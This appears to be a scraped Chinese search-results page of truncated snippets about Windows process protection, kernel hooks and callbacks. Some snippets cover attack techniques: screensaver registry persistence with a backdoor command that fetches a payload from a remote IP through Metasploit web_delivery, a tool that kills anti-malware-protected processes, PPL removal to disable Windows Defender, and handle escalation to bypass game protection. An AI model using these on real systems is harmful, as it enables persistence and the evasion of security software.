驱动(看这名字应该还有360SelfProtection_win10.sys文件),在0环通过hook等手段保护注册表项,重要进程进程等。...本文就如何实现一个进程保护功能进行探究,驱动就不写了,就写一个用户层的。 实现原理 windows提供了一个可以杀死其他进程的API:TerminateProcess。...New_TerminateProcess(_In_ HANDLE hProcess,_In_ UINT uExitCode) { unhookTerminateProcess();MessageBox(NULL,L"该进程受保护...那么如果要选择性保护进程,又应该怎么做呢。注意TerminateProcess的第一个参数,传入的是一个句柄,这个句柄需要从openprocess的返回值获得,所以我们还需要知道打开进程的句柄。...New_TerminateProcess(_In_ HANDLE hProcess,_In_ UINT uExitCode) {if(g_handle == hProcess){MessageBox(NULL, L"该进程受保护
如何保护 Windows RPC 服务器,以及如何不保护。 PetitPotam技术在人们的脑海 中仍然记忆犹新。...我认为最好快速了解 Windows RPC 接口是如何保护的,然后进一步了解为什么可以使用未经身份验证的EFSRPC接口。 ...基本上有三种方式,可以混搭: 保护端点 保护接口 临时安全 让我们依次来确定每个人如何保护 RPC 服务器。...保护接口 保护 RPC 服务器的下一个方法是保护接口本身。...这意味着谁可以调用 RPC 服务器取决于托管进程注册了哪些其他端点,在本例中是 LSASS。
windows内核提权,又一突破游戏保护的方式。...一丶 句柄表 1.1 介绍 当一个进程被保护的时候 比如无法获取其进程句柄权限 (OpenProcess) 或者无法获取内存读写访问权限的时候,则可以使用此方法来进行提权。...2.3 进程保护驱动Demo源码 #include #include #define PROCESS_TERMINATE (0x0001)...可以指定进程,然后指定这个进程的一个句柄,将这个句柄提权。 四丶效果图 可以看到 首先打印的HANDLE 然后进行首次关闭notepad. 因为保护驱动加载了,所以首次结束notepad是失败的。...继续之后就会结束被保护的进程。 五 丶 突破游戏保护 本文以常规方式进行演示的,知道原理了那么自己突破应该明白了吧。
关于进程保护,在 64 位版的 Windows7 操作系统中不能通过 HOOK SSDT 等方式来实现,因为会触发 PatchGuard 保护造成蓝屏。...在本文中通过内核函数 ObRegisterCallbacks 来实现对一般进程的保护。...“ObRegisterCallbacks 例程为线程、进程和桌面句柄操作注册一个回调例程列表。”通过这个函数注册一个回调函数,在回调处理函数中执行我们需要执行的保护操作。...在这个函数中,通过判断进程名确定是否为指定的目标进程,并将访问权限成员 pOperationInformation->Parameters->CreateHandleInformation.DesiredAccess...中的进程关闭、操作、读写等权限标志位全部去掉。
屏幕保护程序是在用户不活动时间的可配置时间后执行的程序,由文件扩展名为 .scr 的可移植可执行 (PE) 文件组成。...Windows屏幕保护程序应用程序scrnsave.scr位于64位Windows系统中,以及基本Windows安装中包含的屏幕保护程序。...C:\Windows\System32\C:\Windows\sysWOW64\以下屏幕保护程序设置存储在注册表 () 中,可以对其进行操作以实现持久性:HKCU\Control Panel\Desktop...- 在执行屏幕保护程序之前设置用户不活动超时攻击者可以使用屏幕保护程序设置来保持持久性,方法是将屏幕保护程序设置为在用户处于非活动状态的特定时间范围后运行恶意软件。...Add-ScrnSaveBackdoor.ps1Add-ScrnSaveBackdoor -PayloadURL http://192.168.85.161:8080/U4yNTneuse exploit/multi/script/web_deliveryset payload windows
Windows服务器下开启nodejs后台守护进程 windows服务器部署node项目 启动node服务以后,CMD窗口不能关闭 关闭以后服务就挂掉了 因此需要开启守护进程,使其后台执行 安装forever
文章目录 一、selinux 进程保护 二、宽容模式与强制模式 一、selinux 进程保护 ---- selinux 进程保护 一旦开启后 , 其它进程不能调试指定的进程 ; Android 5.0...getenforce Enforcing 二、宽容模式与强制模式 ---- selinux 有两种模式 : 0 : permissive , 宽容模式 ; 该模式下 selinux 关闭 , 可以调试进程数据...; 1 : enforcing , 强制模式 ; 该模式下 selinux 打开 , 不能调试进程数据 ; 默认模式为 强制模式 ; 如果在调试进程时 , 调试失败 , 需要查看当前的 selinux
一、最基本的系统进程 也就是说,这些进程是系统运行的基本条件,有了这些进程,系统就能正常运行 1、smss.exeSession Manager 2、csrss.exe子系统服务器进程 3、winlogon.exe...(系统服务) 7、termsrv.exe提供多会话环境允许客户端设备访问虚拟的Windows 2000 Professional 桌面会话以及运行在服务器上的基于Windows 的程序。...(系统服务) 12、msdtc.exe并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管理器。(系统服务) 13、faxsvc.exe帮助您发送和接收传真。...Service (NsMonitor) Nsum.exe Windows Media Unicast Service (NsUnicast) 微软文档:Windows 2000 中的默认进程 Csrss.exe...本地安全身份验证服务器,它生成的进程将负责验证用户的身份以使用Winlogon 服务。该进程通过使用身份验证程序包(如默认的Msgina.dll)来执行。
通过修改此表的函数地址可以对常用 Windows 函数及 API 进行 Hook,从而实现对一些关心的系统动作进行过滤、监控的目的。...KeServiceDescriptorTable找到所有的内核函数,通过内核函数+偏移找到OpenProcess函数 [image-20220215155330682.png] 在 NT 4.0 以上的 Windows...操作系统内核文件,包括内核和执行体层)是导出的,而 KeServiceDescriptorTableShadow 则是没有被 Windows 操作系统所导出。...FuZwOpenProcess g_OldZwOpenProcess; //服务描述符表指针 KSERVICE_TABLE_DESCRIPTOR* g_pServiceTable = NULL; //要保护进程的...DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_opt_ PCLIENT_ID ClientId ) { //当此进程为要保护的进程时
通过修改此表的函数地址可以对常用 Windows 函数及 API 进行 Hook,从而实现对一些关心的系统动作进行过滤、监控的目的。...操作系统内核文件,包括内核和执行体层)是导出的,而 KeServiceDescriptorTableShadow 则是没有被 Windows 操作系统所导出。...FuZwOpenProcess g_OldZwOpenProcess; //服务描述符表指针 KSERVICE_TABLE_DESCRIPTOR* g_pServiceTable = NULL; //要保护进程的...DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_opt_ PCLIENT_ID ClientId ) { //当此进程为要保护的进程时...而在卸载驱动过后则可以用taskkill命令直接杀死进程,证明实现了进程保护
tasklist # 查看进程信息,tasklist命令的筛选器功能非常强大 先使用tasklist 命令查看当前系统中的进程列表,然后针对你要杀的进程使用taskkill命令 如要杀nginx.exe...进程,命令如下: taskkill /im nginx.exe /f 也可以使用pid杀: taskkill /pid {pid} 您可以运行taskkill /?
关于Backstab Backstab是一款功能强大的安全研究工具,在该工具的帮助下,广大研究人员可以轻松终止那些受反恶意软件产品保护的进程。...没错,我们为何不直接终止相关进程呢? Backstab这款工具能够通过利用sysinternals的进程管理驱动器(ProcExp)终止受反恶意软件产品保护的进程,而这个驱动器是由微软签名的。...当我们查看到UI时,你可能无法终止受保护的进程,但可以终止它的句柄,因为ProcExp UI会指示内核驱动程序终止这些句柄。而Backstab能做到同样的事情,只不过没有提供UI。...https://github.com/Yaxser/Backstab 工具使用帮助 Usage: backstab.exe [options] -n, 通过名称选择进程...,需包含.exe后缀 -p, 通过PID选择进程 -l, 列举所有受保护进程的句柄 -k, 选择要终止的受保护进程的句柄 -x, 选择一个指定的句柄 -d, 指定ProcExp提取路径 -s
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内...
x64(32)下的进程保护回调....一丶进程保护线程保护 1.简介以及原理 以前我们讲过.SSDT 可以做很多事情.比如可以防止进程被结束 其实到了x64下.你也可以HOOK SSDT.只不过你需要过一下PatchGuard 但是在你过不了...PG的情况下.其实操作系统也给你提供了回调进行保护....MSDN: https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-obregistercallbacks...1.3注意的问题 编写代码的时候会发生蓝屏.原因是你设置前指针后.后指针需要设置为NULL 因为如果是进程保护的话. 当创建进程的时候则会遍历对象数组.依次调用.
Windows 编程(多进程) 进程组成: 操作系统用来管理进行的内核对象 内核对象也是系统用来存放关于进程的统计信息的地方.内核对象是 操作系统内部分配的一个内存块,该内存块是一种数据结构,其成员负责维护...,此线程负责执行包含在进程的地址空 间的中的代码.也就是,真正完成代码执行的是线程,而进程只是纯种的容器, 或者说是线程的执行环境....如果此参数为//NULL,则新进程将使用调用进程的环境 // _In_opt_ LPCWSTR lpCurrentDirectory,// 进程当前目录的完整路径 _In_ LPSTARTUPINFOW...{ HANDLE hProcess; HANDLE hThread; DWORD dwProcessId; DWORD dwThreadId; } #include <Windows.h...通常用来 在父进程和子进程之间通信。 只能实现本地两个进程之间的通信。 不能实现网络通 信。
winmgmt.exe进程文件: winmgmt or winmgmt.exe进程名称: Windows Management Service描述: Windows Management Service...C++ Builder 是否为系统进程: 否 calc.exe 进程文件: calc or calc.exe 进程名称: Calculator 描述: Microsoft Windows计算器程序...是否为系统进程: 否 cdplayer.exe 进程文件: cdplayer or cdplayer.exe 进程名称: CD Player 描述: Microsoft Windows包含的CD播放器...是否为系统进程: 否 charmap.exe 进程文件: charmap or charmap.exe 进程名称: Windows Character Map 描述: Windows字符映射表用来帮助你寻找不常见的字符...是否为系统进程: 否 cmd.exe 进程文件: cmd or cmd.exe 进程名称: Windows Command Prompt 描述: Windows控制台程序。
描述 可以关闭Windows Defender服务并通过提升权限删除ppl保护,然后删除Windows Defender中的DLL和其他文件,使Windows Defender服务无法运行,从而导致Windows...哈哈哈.... 3.移除 PsProtectSignerAntimalware-Light 保护 关于“保护”的快速背景: 保护进程首先出现在 windows vista 中,作为对关键 windows...用户模式服务的增强,后来在 windows 8.1 中演变为保护进程 (PPL).一般来说可执行文件必须使用特殊证书进行签名,然后才有可能使用保护进程 (PPL)。...只要我们对服务对象有足够的访问权限,就可以更改服务保护。...那么我们可以使用TrustedInstaller权限通过ChangeServiceConfig2W来停止PsProtectSignerAntimalware-Light 保护,然后修改和删除Windows
简介 Windows Defender ,现名 Microsoft Defender,曾用名 Microsoft Anti Spyware ,是一个杀毒程序,可以运行在 Windows XP 和 Windows...Server 2003 操作系统上,并已内置在 Windows Vista , Windows 7 , Windows 8 , Windows 8.1 , Windows 10 和 Windows 11...2020年4月,在 Windows 10 2020年5月更新中(2004),微软更新了 Windows 安全中心应用,将其中的 Windows Defender 更改为 Microsoft Defender...但是通常会被Windows Defender识别为病毒删除。 这都是因为开启了Windows Defender的实时保护功能。记得之前关掉这个实时保护后,就算重启电脑也不会自动开启,现在好像不行了。...win+R后输入gpedit.msc,打开本地组策略编辑器 双击打开关闭实时保护 点击已启用,应用 ,确定
目录 1 根据端口查询进程 2 通过进程号杀进程 1 根据端口查询进程 netstat -ano|findstr "8080" 2 通过进程号杀进程 taskkill /pid 7300 -f
代码: C++ #include #include #pragma comment(lib,"psapi.lib") void GetPathByProcessId
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
